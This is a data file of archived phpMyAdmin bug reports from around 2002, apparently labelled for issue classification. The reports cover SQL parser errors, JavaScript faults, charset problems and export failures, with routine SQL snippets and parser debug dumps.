"24444","6846","2.3.0 rc2) print view, ModifyDeleteAtRight.
when I click print view in browse mode if cfg[ ModifyDeleteAtRight ] = false it s OK but if cfg[ ModifyDeleteAtRight ] = true then I have an empty column in the print view at the right Original URL https sourceforge.net p phpmyadmin bugs 477 https sourceforge.net p phpmyadmin bugs 477 Original author mdelorme Found in version 2.3.0 rc2","bug"
"24444","6847","2.3.0 rc2) syntax coloring.
I use cfg[ UseSyntaxColoring ] = TRUE; but I don t see any change.
Original URL https sourceforge.net p phpmyadmin bugs 478 https sourceforge.net p phpmyadmin bugs 478 Original author mdelorme Found in version 2.3.0 rc2","bug"
"24444","6848","2.3.0) Matching a float field.
From Lance Davis Trying to edit a record from browse when there isnt a primary key doesnt find the record but displays a blank new one, is it because of float fields that dont have an exact match ??
If so should it ignore float fields in the select and if there are more than one result get the user to choose which one to edit ???
Original URL https sourceforge.net p phpmyadmin bugs 479 https sourceforge.net p phpmyadmin bugs 479 Original author lem9","bug"
"24444","6849","2.3.0 rc2) terminating space for values.
pma adds a space to certain values in the output of sql.php I noticed that on varchar values.
Example amp;lt;td valign= amp;quot;top amp;quot; bgcolor= amp;quot; DDDDDD amp;quot; amp;gt;Schweiz amp;lt; td amp;gt; ; there is no space after z when I click on edit nor when I read the value with my own script.
Original URL https sourceforge.net p phpmyadmin bugs 482 https sourceforge.net p phpmyadmin bugs 482 Original author ci dev Found in version 2.3.0 rc2","bug"
"24444","6850","outdated) No FILE priv.
on a db if no INSERT UPDATE one.
From Lance Davis Also users check database privileges database xxx shouldnt show FILE for users if they dont have INSERT or UPDATE privileges on xxx, because FILE is meaningless without permission to use the file, it is a global permission switch which doesnt relate to the individual database unless the user already has permission to modify that database.
With 1000 users all with FILE permission to upload their tables it shows them all when you select someone elses database.
Original URL https sourceforge.net p phpmyadmin bugs 480 https sourceforge.net p phpmyadmin bugs 480 Original author lem9 Found in version 2.3.0 rc4","bug"
"24444","6851","CVS 2.2.3 ???.
The latest CVS version is named 2.2.3 rc2 .
I think it should be 2.3.0 rc2 ;) Original URL https sourceforge.net p phpmyadmin bugs 481 https sourceforge.net p phpmyadmin bugs 481 Original author j0erch","bug"
"24444","6852","2.2.6) syntax error in .inc.php file.
There are syntax error in file usr local share doc apache phpmyadmin lang russia n koi8.inc.php on string 232 Original string strPmaUriError = amp;amp;auml; amp;amp;Eacute; amp;amp;Ograve; amp;amp;Aring; amp;amp;Euml; amp;amp;Ocirc; amp;amp;Eacute; amp;amp;times; amp;amp;Aacute; amp;lt;tt amp;gt; cfgPmaAbsoluteUri amp;lt; tt amp;gt; amp;amp;Auml; amp;amp;Iuml; amp;amp;Igrave; amp;amp;Ouml; amp;amp;Icirc; amp;amp;Aacute; amp;amp;Acirc; amp;amp;Ugrave; amp;amp;Ocirc; amp;amp;Oslash; amp;amp;Otilde; amp;amp;Oacute; amp;amp;Ocirc; amp;amp;Aacute; amp;amp;Icirc; amp;amp;Iuml; amp;amp;times; amp;amp;Igrave; amp;amp;Aring; amp;amp;Icirc; amp;amp;Aacute; amp;amp;times; amp;amp;divide; amp;amp;Aacute; amp;amp;Ucirc; amp;amp;Aring; amp;amp;Iacute; amp;amp;Euml; amp;amp;Iuml; amp;amp;Icirc; amp;amp;AElig; amp;amp;Eacute; amp;amp;Ccedil; amp;amp;Otilde; amp;amp;Ograve; amp;amp;Aacute; amp;amp;Atilde; amp;amp;Eacute; amp;amp;Iuml; amp;amp;Icirc; amp;amp;Icirc; amp;amp;Iuml; amp;amp;Iacute; amp;amp;AElig; amp;amp;Aacute; amp;amp;Ecirc; amp;amp;Igrave; amp;amp;Aring;!
; Working string strPmaUriError = amp;amp;auml; amp;amp;Eacute; amp;amp;Ograve; amp;amp;Aring; amp;amp;Euml; amp;amp;Ocirc; amp;amp;Eacute; amp;amp;times; amp;amp;Aacute; amp;lt;tt amp;gt; cfgPmaAbsoluteUri amp;lt; tt amp;gt; amp;amp;Auml; amp;amp;Iuml; amp;amp;Igrave; amp;amp;Ouml; amp;amp;Icirc; amp;amp;Aacute; amp;amp;Acirc; amp;amp;Ugrave; amp;amp;Ocirc; amp;amp;Oslash; amp;amp;Otilde; amp;amp;Oacute; amp;amp;Ocirc; amp;amp;Aacute; amp;amp;Icirc; amp;amp;Iuml; amp;amp;times; amp;amp;Igrave; amp;amp;Aring; amp;amp;Icirc; amp;amp;Aacute; amp;amp;times; amp;amp;divide; amp;amp;Aacute; amp;amp;Ucirc; amp;amp;Aring; amp;amp;Iacute; amp;amp;Euml; amp;amp;Iuml; amp;amp;Icirc; amp;amp;AElig; amp;amp;Eacute; amp;amp;Ccedil; amp;amp;Otilde; amp;amp;Ograve; amp;amp;Aacute; amp;amp;Atilde; amp;amp;Eacute; amp;amp;Iuml; amp;amp;Icirc; amp;amp;Icirc; amp;amp;Iuml; amp;amp;Iacute; amp;amp;AElig; amp;amp;Aacute; amp;amp;Ecirc; amp;amp;Igrave; amp;amp;Aring;!
; Thank you.
Original URL https sourceforge.net p phpmyadmin bugs 483 https sourceforge.net p phpmyadmin bugs 483 Original author anonymous Found in version 2.2.6","bug"
"24444","6853","2.3.0 rc3) cvs.
parse error in tbl qbe.php3 missing amp;quot;; amp;quot; on line 797.
Original URL https sourceforge.net p phpmyadmin bugs 484 https sourceforge.net p phpmyadmin bugs 484 Original author danone","bug"
"24444","6854","Problem with a basic select query.
In a table called amp;quot;conference amp;quot;, I have a field called amp;quot;c order amp;quot;, whenever I do a select query from the interface I get Error SQL query SELECT `c id`,`c filename`,`c name`,`t id`,`c description`,`c description fr`,`c date`,`c logcount`,`c owner`,`c length`,`c filesize`,`g id`,`c panel`,`f id`,`c learning objective`,`c learning objective fr`,`cme cr q id`,`c disable`,`c language`,`c nb credits`,`c nb slide`,`c approved`,`c logcount speaker`,`c modified`,`c is simon viewer`,`ce id`,`c ORDER `,`c transcription`, `c ORDER` FROM `conference` WHERE 1 AND `c id` = 12 LIMIT 0, 30 MySQL said Unknown column c ORDER in field list I think it s because of the reserved amp;quot;order amp;quot; words...
It didn t happen in the old version I used before phpMyAdmin 2.2.6) py Original URL https sourceforge.net p phpmyadmin bugs 485 https sourceforge.net p phpmyadmin bugs 485 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6855","Select, Delete, sort, ... Bug.
I got a table called appbb1 user table every action I want to make inside the table is not possible all the times there is the error massege with appbb1 user TABLE does not exist Markus Wilhelm markus myphpportal.de Original URL https sourceforge.net p phpmyadmin bugs 486 https sourceforge.net p phpmyadmin bugs 486 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6856","2.3.0 CVS) Wrong page after table creation.
When I create a table, phpMyAdmin ignores my cfg[ DefaultTabTable ] directive and jumps directly to tbl properties.
Original URL https sourceforge.net p phpmyadmin bugs 487 https sourceforge.net p phpmyadmin bugs 487 Original author rabus Found in version 2.3.0 rc2","bug"
"24444","6857","2.3.0 rc3) js error in no frame mode.
After opening a table in a new window shift click on left frame on a table) and selecting Browse , a JavaScript error occours window.parent.frames.nav.document is null or no object translated from german).
This is just the case for Browse tab, all other tabs seem to work.
This error occours using IE6 and Opera 6.03.
Original URL https sourceforge.net p phpmyadmin bugs 488 https sourceforge.net p phpmyadmin bugs 488 Original author ci dev Found in version 2.3.0 rc3","bug"
"24444","6858","2.3.0 rc2) Kill process ie6.
1\.
When in Home Show processess I amp;quot;Kill amp;quot; a process, an Internet Explorer v.6.0) Error occurs Line 109 Char 1 amp;quot;window.parent.frames.nav.document.getElementById ...) is null or not an object amp;quot; Note This line number corresponds to Line 1094 of common.lib.php v 1.110) of PMA 2.3.0 rc2) I tested this with Netscape Communicator 4.77, and it works without errors.
2\.
When I amp;quot;Kill amp;quot; the last process in the list the thread created by the query amp;quot;SHOW PROCESSLIST amp;quot;) PMA shows an error like Error SQL query KILL 82529 MySQL said Unknown thread id 82529 amp;lt;Back amp;gt; Killing this process is not a good idea but in MySQL this query is executed without errors.)
After clicking on amp;lt;Back amp;gt; link and closing IE error box we have this SQL query description box SQL query [Edit] [Explain SQL Code] [Create PHP Code] SHOW PROCESSLIST As we can expect by clicking on [Explain SQL Code] link we got a wrong query EXPLAIN SHOW PROCESSLIST Thats all folks!
I will try to fix this next days Svetlio Original URL https sourceforge.net p phpmyadmin bugs 489 https sourceforge.net p phpmyadmin bugs 489 Original author svetlio Found in version 2.3.0 rc2","bug"
"24444","6859","Deleting a relation manually.
When i hit delete on a record in the relation table after browsing it this is the sql it created DELETE FROM `relation` WHERE `master db` = legend AND `master TABLE ` = products cats AND ` master field` = mcatid Some spaces have creeped in and capitals for master table.
I even manually typed the correct sql and it still capitalised master table.
Original URL https sourceforge.net p phpmyadmin bugs 490 https sourceforge.net p phpmyadmin bugs 490 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6860","2.2.6) Header errors.
I get this message running Apache 1.3.9 PHP 4.05 on Windows 2000.. phpmyadmin 2.2.6 Warning Cannot add header information headers already sent by output started at e \htdocs\phpMyAdmin\libraries\auth\config.auth.
lib.php 91) in e \htdocs\phpMyAdmin\header.inc.php on line 23 Original URL https sourceforge.net p phpmyadmin bugs 491 https sourceforge.net p phpmyadmin bugs 491 Original author anonymous Found in version 2.2.6","bug"
"24444","6861","2.3.0 rc2) JavaScript error on display.
When I see a table with have a comment with a , I see a JavaScript error.
I write this bug to indicate the problem to the phpMyAdmin Team and for all the people who are concerned by this bug.
The solution to correct this problem is Edit the file amp;quot;libraries common.lib.php amp;quot; Replace the two last of the ligne number 1097 Original URL https sourceforge.net p phpmyadmin bugs 492 https sourceforge.net p phpmyadmin bugs 492 Original author lolo 32 Found in version 2.3.0 rc2","bug"
"24444","6862","Lost Relations column comments.
ok, first you need to create a table then relate it to another table then change the name of foreign key field, then relate it somewhere else or leave it, i havent tryed this but it may also happen if you delete a foreign key column) ok now pull up a pdf of your schema the old relation is still there but now it is pointing from the primary key off the table that was altered.
the only way to get rid of this is to find the row in the relations table and delete it.
heh probly an extremely rare problem, but worth fixing.
if i left anything out please email me.
Original URL https sourceforge.net p phpmyadmin bugs 493 https sourceforge.net p phpmyadmin bugs 493 Original author thrasher6669 Found in version Latest Git","bug"
"24444","6863","2.3.0 rc2) DELETE SYNTAX.
using v 2.3.0 rc2 Has the mySQL DELETE function been implemented into the SQL operation?
Or only SELECT?
My intention is to remove a subset of records with a conditional DELETE statement as in; DELETE FROM my table WHERE my field = amp;quot;my subset amp;quot;.
This syntax works from a mysql command line.
PhpMyAdmin returns a Javascript amp;quot;undefined amp;quot; error which quotes the exact syntax as above.
Original URL https sourceforge.net p phpmyadmin bugs 494 https sourceforge.net p phpmyadmin bugs 494 Original author kiernanb Found in version 2.3.0 rc2","bug"
"24444","6864","2.3.0 rc3) Edit Links with double sql query.
Hi, if you query a table by example and you have selected many fields, the generated edit link is too long for some browsers.
But if you change some code in display tbl.lib.php at section 1.2.1 Modify link s) you can avoid this problem.
First you fill lnk goto with the link the script should go to.
In this link you have also the variable sql query.
After that you fill the edit url with sql query and lnk goto wich also holds the sql query.
After that the edit url is filled two times with sql query.
If you change the code for the lnk goto to the following, you don t have the problem any more.
Here the code you have to change 1.2.1 Modify link s) if is display[ edit lnk ] == ur ) \{ update row case lnk goto = sql.php ; edit url = tbl change.php .
?
.
url query .
amp;amp;amp;primary key= .
uva condition .
amp;amp;amp;sql query= .
urlencode sql query) .
amp;amp;amp;goto= .
urlencode lnk goto); edit str = GLOBALS[ strEdit ]; \} end if 1.2.1) I hope I could help.
greets rollmotz Original URL https sourceforge.net p phpmyadmin bugs 495 https sourceforge.net p phpmyadmin bugs 495 Original author rollmotz Found in version 2.3.0 rc2","bug"
"24444","6865","2.3.0 rc2) Bug in set time limit ) call.
In read dump.php Increases the max.
allowed time to run a script set time limit cfg[ ExecTimeLimit ]); Gets some core libraries require .
libraries grab globals.lib.php3 ); require .
libraries common.lib.php3 ); I think before you can use globals you must read globals ) So set time limit must be after global variable reading.
And configuration must be CONFIG[ cfg ] not cfg?
Also if i reordered lines it kept telling me that time limit was exceeded, even if i set time limit to 0 and i made sure that it was 0 in that point configuration value).
I use PHP 4.2.1 under Windows 2000 and Apache Original URL https sourceforge.net p phpmyadmin bugs 496 https sourceforge.net p phpmyadmin bugs 496 Original author finsoft Found in version 2.3.0 rc2","bug"
"24444","6866","2.3.0 rc2) data in table name causes problems.
Hello, We have a table called employee data in one of our databases.
When attempting to create and SQL query using the select tab or the sql tab, the table name is transformed to employee DATA.
This causes the query to fail because mysql can t find the table.
Thanks, Tom Main Original URL https sourceforge.net p phpmyadmin bugs 497 https sourceforge.net p phpmyadmin bugs 497 Original author lerxst Found in version 2.3.0 rc2","bug"
"24444","6867","2.3.0 rc2) column names with order misparsed.
i have a column named headline order.
whenever i try to either do a select or sql query, phpmyadmin changes the name of the column to `headline ORDER ` with the space after order .
there seems to be no workaround.
Error SQL query SELECT `storyid`,`subcat1`,`title`,`url`,`display until`,`headline ORDER `,` ts`,`league` FROM `topnews` WHERE 1 AND `league` LIKE nhl LIMIT 0, 30 MySQL said Unknown column headline ORDER in field list Original URL https sourceforge.net p phpmyadmin bugs 498 https sourceforge.net p phpmyadmin bugs 498 Original author kelly hirano Found in version 2.3.0 rc2","bug"
"24444","6868","2.3.0 rc2) Create PHP code from DROP TABLE query.
If I try to use the amp;quot;Create PHP code amp;quot; link after I submitted a amp;quot;DROP TABLE amp;quot; query, phpMyAdmin tries to drop the table which, of course, does not exist anymore once again.
Original URL https sourceforge.net p phpmyadmin bugs 499 https sourceforge.net p phpmyadmin bugs 499 Original author rabus Found in version 2.3.0 rc2","bug"
"24444","6869","2.3.0 rc2) EXPLAIN should be only for SELECTs.
MySQL 3.23.49 nt SQL query EXPLAIN ALTER TABLE `tbl` ORDER BY `rowname` MySQL said You have an error in your SQL syntax near ALTER TABLE `tbl` ORDER BY `rowname` at line 1 Is this SQL query meaningfull?
PMA generates this SQL query from amp;quot;Alter table order by [rowname] singly) amp;quot; on page amp;quot;tbl properties operations.php?
amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 500 https sourceforge.net p phpmyadmin bugs 500 Original author mandabaer Found in version 2.3.0 rc2","bug"
"24444","6870","PMA sqlFormat incorrectly formats query.
for example... this query.
ALTER TABLE `auth mysql group` DROP PRIMARY KEY, ADD PRIMARY KEY ` user name`, `user group`) gets altered to this ALTER TABLE `auth mysql GROUP ` DROP PRIMARY KEY, ADD PRIMARY KEY ` user name`, `user group`) Original URL https sourceforge.net p phpmyadmin bugs 501 https sourceforge.net p phpmyadmin bugs 501 Original author urkle Found in version 2.3.0 rc2","bug"
"24444","6871","2.3.0 rc3) Problem with \n s in char.
I have a CHAR coulmn, and when I edit a row, the \n s are removed from the CHAR column.
I m guessing because phpMyAdmin uses a text field for CHAR instead of textarea.
Original URL https sourceforge.net p phpmyadmin bugs 502 https sourceforge.net p phpmyadmin bugs 502 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6872","Undefined variable sub part.
Notice Undefined variable sub part in c \program files\apache group\apache\htdocs\phpmyadmin\db details links.php on line 35 i get this error after installing phpmyadmin CVS on july 15 9 00am the error occurs on these pages Start Page amp;gt; Show MySQL runtime information Start Page amp;gt; Show MySQL system variables Start Page amp;gt; Show processes all i do is start a session of phpmyadmin in my browser click those and i get the error.
Original URL https sourceforge.net p phpmyadmin bugs 503 https sourceforge.net p phpmyadmin bugs 503 Original author thrasher6669","bug"
"24444","6873","2.3.0 rc3) Query was empty main.php).
We received 2 reports about this left frame says amp;quot;no databases amp;quot; and right frame Error SQL query SELECT VERSION ) as version, USER ) as user MySQL said Query was empty I am trying to reproduce the bug.
Original URL https sourceforge.net p phpmyadmin bugs 504 https sourceforge.net p phpmyadmin bugs 504 Original author lem9","bug"
"24444","6874","SSL problem apache url rewrite related).
We are having problems with phpMyAdmin when using an SSL connection.
The problem occurs when trying to browse a table.
The following error message is typical Error SQL query SELECT 2A FROM 60author 60 LIMIT 0, 30 MySQL said You have an error in your SQL syntax near 2A FROM 60author 60 LIMIT 0, 30 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 505 https sourceforge.net p phpmyadmin bugs 505 Original author hansfj Found in version 2.3.0 rc3","bug"
"24444","6875","2.3.0 rc3) Propose table structure bug.
when you click amp;quot;Propose table structure amp;quot; you will get a sql statement similar to this SELECT FROM `menu` PROCEDURE ANALYSE ) LIMIT 0, 50 this works fine for tables that have less then 50 rows but not for those with greater then 50 rows, it returns nothing, although if i plug it into another program minus the limit clause i get retured results.
i am using 2.3.0 RC3 Original URL https sourceforge.net p phpmyadmin bugs 506 https sourceforge.net p phpmyadmin bugs 506 Original author thrasher6669","bug"
"24444","6876","2.3.0 CVS) Huge charset problem.
Take a record with chars including accents and edit it the letters with accents are replaced by strange but uncorrect things...
Original URL https sourceforge.net p phpmyadmin bugs 507 https sourceforge.net p phpmyadmin bugs 507 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6877","2.3.0) SQL textarea auto select Linux Mozilla).
The autoselecting of text in the SQL entry textarea is causing a problem with pasting on Linux X..
If I already have some text in the textarea I cannot copy select text in another program thereby copying to the X Selection) and past the text into the textarea via clicking the middle mouse button).
As when I do the test in the textarea gets reselected and copied into the X Selection so I end up duplicating what is already in the textarea instead of pasting the new text... Can this amp;quot;feature amp;quot; be disabled?
or optionally disabled...
Original URL https sourceforge.net p phpmyadmin bugs 508 https sourceforge.net p phpmyadmin bugs 508 Original author urkle Found in version 2.3.0","bug"
"24444","6878","2.3.0 rc3) requires hostname for socket connection.
when using a amp;quot;socket amp;quot; connection, leaving the hostname field blank generates an error message.
for servers other than 1, leaving the hostname blank results in the server not being shown.
you didn t used to have to specify the host in early 2.2 releases Original URL https sourceforge.net p phpmyadmin bugs 509 https sourceforge.net p phpmyadmin bugs 509 Original author iamcal Found in version 2.3.0 rc3","bug"
"24444","6879","2.3.0 rc2) keyword part of field name.
In version 2.0.3 rc3) if the field name contains a keyword as in mfg group .
The function PMA sqlFormat in sql.php is altering the SQL statement.
Original URL https sourceforge.net p phpmyadmin bugs 510 https sourceforge.net p phpmyadmin bugs 510 Original author welsch Found in version 2.3.0 rc2","bug"
"24444","6880","2.3.0 cvs) can t produce PDF chk rel).
If there is an error for example, the column comments table is defined but not found), strRelationNotWorking is displayed, and PDF output can t occur.
Original URL https sourceforge.net p phpmyadmin bugs 513 https sourceforge.net p phpmyadmin bugs 513 Original author lem9","bug"
"24444","6881","2.3.0 rc3) LIMIT error.
phpmyadmin is overlooking a valid LIMIT query in MySQL.
It is possible to select an offset without selecting the number of rows using LIMIT 10, 1 which means take all the rows from 11 onwards up to no limit.
If you do this in the query box, phpmyadmin tries to apply its own limit not seeing this one and breaks the query.
Original URL https sourceforge.net p phpmyadmin bugs 511 https sourceforge.net p phpmyadmin bugs 511 Original author bigredlinux Found in version 2.3.0 rc3","bug"
"24444","6882","2.3.0 rc3) Apache error when dropping a table.
BUG I ve got one !!!)
Apache error when dropping a table phpMyAdmin 2.3.0 rc3 also with 2.3.0 rc2) Apache 1.3.26 php 4.0.4 MySQL Ver 3.22.32 Netscape 4.75 sparc solaris 2.7) When dropping a table, Apache says Bad Request Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.
File tbl properties links.php, line 40, col 150 Id tbl properties links.php,v 1.22 2002 07 11 21 27 16 loic1 Exp ) arg7 = ...)sql query= .
...) Remove the space between amp;quot;sql query= amp;quot; and amp;quot; amp;quot; arg7 = ...)sql query= .
...) ... and it s working.
Thanks for wrinting phpMyAdmin Original URL https sourceforge.net p phpmyadmin bugs 514 https sourceforge.net p phpmyadmin bugs 514 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6883","RC3 wont run at all see phpmyadmin.net).
Environment Win2k PHP 4.2.1 MySQL 3.23.43max phpmyadmin only shows a blank screen.
Original URL https sourceforge.net p phpmyadmin bugs 512 https sourceforge.net p phpmyadmin bugs 512 Original author anonymous","bug"
"24444","6884","2.3.0 rc3) error after decline drp tbl.
Trying to decline a drop table actually declines it but gives an error as a result Database phpMyAdmin table PMA bookmark1234 running on localhost Error SQL query SHOW TABLE STATUS LIKE PMA bookmark1234 MySQL said No Database Selected Original URL https sourceforge.net p phpmyadmin bugs 515 https sourceforge.net p phpmyadmin bugs 515 Original author ci dev Found in version 2.3.0 rc3","bug"
"24444","6885","Problem with Grants.
After I create a new user and grant him access to a table I get the following error.
Begin Error SQL query GRANT Select, Insert, Update, Delete, Create, Drop, References, Index, Alter ON `test`.
TO test localhost MySQL said Can t find any matching row in the user table End Notice that the test localhost format doesn t seem to work on mysql.
It should read test localhost with the single quotes) I m using mysql 3.23.49.
Original URL https sourceforge.net p phpmyadmin bugs 516 https sourceforge.net p phpmyadmin bugs 516 Original author anonymous","bug"
"24444","6886","2.3.2) amp;quot;USE amp;quot; command in query box.
When I want to change the database with the command amp;quot;use database amp;quot;, always the information of the old database is displayed.
Maybe you should implement a amp;quot;SELECT DATABASE ) amp;quot; when loading the page, to determine the current selected database.
Regards Georg Original URL https sourceforge.net p phpmyadmin bugs 517 https sourceforge.net p phpmyadmin bugs 517 Original author anonymous Found in version 2.3.2","bug"
"24444","6887","2.3.0 rc3) Runtime Error on Line 62.
Opening every page past the main screen, while running in single database mode produces a popup telling me ===================== Runtime Error on Line 26 Access Denied.
[OK] ====================== I had a similar problem with 2.2.6 rc1 Original URL https sourceforge.net p phpmyadmin bugs 518 https sourceforge.net p phpmyadmin bugs 518 Original author yearginsm Found in version 2.3.0 rc3","bug"
"24444","6888","2.3.0 rc2) InnoDB deleting references.
hi. )
i m using mysql 4.0.1 alpha and php 4.1.0 I might get this error because mysql 4.1 is still an alpha version, this is the problem i used the unix console to make a child table with references to a parent table , until here all is ok.. but when i try to alter the child table example, adding an index) using phpmyadmin 2.3 rc2 , all the references from the child table disappear.
can someone please check this.. greetings from mazatlan mexico ) Juan Fco.
P. juan 3dmonk.net Original URL https sourceforge.net p phpmyadmin bugs 519 https sourceforge.net p phpmyadmin bugs 519 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6889","Table comments not parsed for HTML.
Table comments aren t parsed with htmlentities ) or similar before being displayed, both at the top of tbl properties, and in the input box for editing.
So if the comment contains amp;lt;tags amp;gt;, it can break the page layout.
Original URL https sourceforge.net p phpmyadmin bugs 520 https sourceforge.net p phpmyadmin bugs 520 Original author anonymous Found in version 2.2.5","bug"
"24444","6890","No output incorrect output for export.
When I export from my database, the output is either non existant, or highly corrupted in which the values of some table columns become part of the type of field when I export data) or it creates invalid queries when i copy and paste into a different server such as amp;quot;Blob field cant have a default value).
When I export the structure, it doesnt produce the correct SQL at all, usually consisting of one line which isnt correct in anyway not the total number fields, and not the correct field description.
php 4.1.x, mysql 3.23 win32 i believe) Original URL https sourceforge.net p phpmyadmin bugs 521 https sourceforge.net p phpmyadmin bugs 521 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6891","2.3.0 rc4) lt; td gt; instead of lt; th gt; in tbl change.php.
In tbl change.php3, line 203, amp;lt; th amp;gt; should be used instead of amp;lt; td amp;gt; to close the amp;lt;th amp;gt; tag.
amp;lt;th colspan= amp;quot;5 amp;quot; align= amp;quot;right amp;quot; amp;gt; amp;lt;input type= amp;quot;submit amp;quot; value= amp;quot; amp;lt;?php echo strGo; ?
amp;gt; amp;quot; tabindex= amp;quot; amp;lt;?php echo fields cnt 6; ?
amp;gt; amp;quot; amp;gt; amp;amp;nbsp; amp;lt; td amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 522 https sourceforge.net p phpmyadmin bugs 522 Original author tititou Found in version 2.3.0 rc4","bug"
"24444","6892","2.3.0 rc4) parse error in lib sqlparser.lib.php3.
There is a add comma in libraries sqlparser.lib.php3 V 1.15 on line 570. the correct line should be use now it s use , thanks for fixing nagi Original URL https sourceforge.net p phpmyadmin bugs 523 https sourceforge.net p phpmyadmin bugs 523 Original author nagipeters Found in version 2.3.0 rc4","bug"
"24444","6893","2.3.0 rc4) when running Create Table statement via.
You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT eNpT8UyxUiguzClILCpOLdLLyUzSK8go0ClTMNQzNFUwMjAw0jc w1zcyUzC0sDI2sDK1VMhJzbVU cK0oUFCxSSpS0LfjCs oVEjJTFEoT1VITy1RyEgtSrVXMFAwVDA0toQq8UlNK8kvSy2yU hCCijha gZRAOcGBPkAZ56LUxJLU4MyS1IDM5GI9oKMYSAEhrhEhQVrJ GchiTO8YGBjrdmbtjANhoECuk6cf usamRtYfDAzMb B2uJcpgDAKhFPFA= END CUT Original URL https sourceforge.net p phpmyadmin bugs 524 https sourceforge.net p phpmyadmin bugs 524 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6894","2.3.0 rc4) get Error on Structure Tab.
In the new release phpMyAdmin 2.3.0 rc4, I have it installed and working, but when I select the Structure Tab on the top, I get the following error message at the bottom of the page Error The additional Features for working with linked Tables have been deactivated.
To find out why click here.
But when clicked it goes to an empty page.
amp;quot;Database safari running on nextgen amp;quot; at the top, the index.php3 page.
Can you give any insight?
Thanks Original URL https sourceforge.net p phpmyadmin bugs 525 https sourceforge.net p phpmyadmin bugs 525 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6895","2.3.0 rc4) empty query when uploading dump file.
My System ist Mysql 3.23.47 and PHP 4.2.1. phpMyAdmin 2.3.0 rc4.
If I try to upload a dump file, I receive the error message, amp;quot;empty query amp;quot;.
This only happens, when the dump file contains special characters like xc3xbc,xc3xa4,xc3xb6,xc3x9f etc.
Here an small part of the dump file DROP TABLE IF EXISTS wzs wasserwissen; CREATE TABLE wzs wasserwissen id bigint 4) NOT NULL auto increment, letter char 1) NOT NULL default , ueber varchar 50) NOT NULL default , body text NOT NULL, PRIMARY KEY id) ) TYPE=MyISAM; INSERT INTO lexikon VALUES 321, W , Wassertemperatur , Die Temperatur des Wassers beeinfluxc3x9ft maxc3x9fgeblich die Wasserdichte.
Sie ist abhxc3xa4ngig von der Umgebungstemperatur, die jahreszeitlich bedingt ist.
Trinkwasser soll eine Wassertemperatur zwischen 5xc2xb0C und 15xc2xb0C haben ); Original URL https sourceforge.net p phpmyadmin bugs 526 https sourceforge.net p phpmyadmin bugs 526 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6896","Tables with kewords error on re sort.
If you have a table with a keyword in the name, for instance client order, the keyword part will get capitalized and error out on re sort.
If I browse client order, then re sort by id, I get an error similar to the following Error SQL query SELECT FROM `client ORDER ` ORDER BY ` id` ASC LIMIT 0, 30 MySQL said Table store.client ORDER doesn t exist Original URL https sourceforge.net p phpmyadmin bugs 527 https sourceforge.net p phpmyadmin bugs 527 Original author anonymous Found in version 2.3.0 rc2","bug"
"24444","6897","2.3.0 rc4) amp;quot;found a bug in the SQL parser... amp;quot;.
Running this in the SQL Tab CREATE TABLE `PMA relation` `master db` varchar 64) NOT NULL default , `master table` varchar 64) NOT NULL default , `master field` varchar 64) NOT NULL default , `foreign db` varchar 64) NOT NULL default , `foreign table` varchar 64) NOT NULL default , `foreign field` varchar 64) NOT NULL default , PRIMARY KEY `master db`, `master table`, `master field`), KEY foreign field foreign db, foreign table) ) TYPE=MyISAM COMMENT= Relation table ; Proiduced the following result Your SQL query has been executed successfully You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAwMi8wNy8 yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDAgMSA1MjA8YnIgLz4KTGVmdG92ZXI6IKA8 YnIgLz4KQTogMCAxPGJyIC8 ClNRTDogoENSRUFURSBUQUJMRSBgUE1BX3JlbGF0aW9uYC AoIKCg oKCgoKBgbWFzdGVyX2RiYCB2YXJjaGFyKDY0KSBOT1QgTlV MTCBkZWZhdWx0ICcnLCCgoKCgoKCg YG1hc3Rlcl90YWJsZWAgdmFyY2hhcig2NCkgTk9UIE5VTEwgZG VmYXVsdCAnJywgoKCgoKCgoGBt YXN0ZXJfZmllbGRgIHZhcmNoYXIoNjQpIE5PVCBOVUxMIGRlZ mF1bHQgJycsIKCgoKCgoKBgZm9y ZWlnbl9kYmAgdmFyY2hhcig2NCkgTk9UIE5VTEwgZGVmYXVsd CAnJywgoKCgoKCgoGBmb3JlaWdu X3RhYmxlYCB2YXJjaGFyKDY0KSBOT1QgTlVMTCBkZWZhdWx 0ICcnLCCgoKCgoKCgYGZvcmVpZ25f ZmllbGRgIHZhcmNoYXIoNjQpIE5PVCBOVUxMIGRlZmF1bHQgJ ycsIKCgoKCgoKBQUklNQVJZIEtF WSAoYG1hc3Rlcl9kYmAsIGBtYXN0ZXJfdGFibGVgLCBgbWFzd GVyX2ZpZWxkYCksIKCgoKCgoKBL RVkgZm9yZWlnbl9maWVsZCAoZm9yZWlnbl9kYiwgZm9yZWlnbl 90YWJsZSkgoKCgoKApIFRZUEU9 TXlJU0FNIENPTU1FTlQ9J1JlbGF0aW9uIHRhYmxlJw== END CUT Original URL https sourceforge.net p phpmyadmin bugs 528 https sourceforge.net p phpmyadmin bugs 528 Original author pfraterdeus Found in version 2.3.0 rc4","bug"
"24444","6898","Warning Supplied argument is not......
When I selected a database to work from and simple entered this wrong SQL statement DELETE FROM I Got this error Warning Supplied argument is not a valid MySQL result resource in www phpMyAdmin 2.2.6 sql.php on line 251 After that, a lot of errors that headers cannot be sent, but that s normal P I figured that wrong query s like this should be caught...
Original URL https sourceforge.net p phpmyadmin bugs 529 https sourceforge.net p phpmyadmin bugs 529 Original author jolrael Found in version 2.2.6","bug"
"24444","6899","UPDATE error.
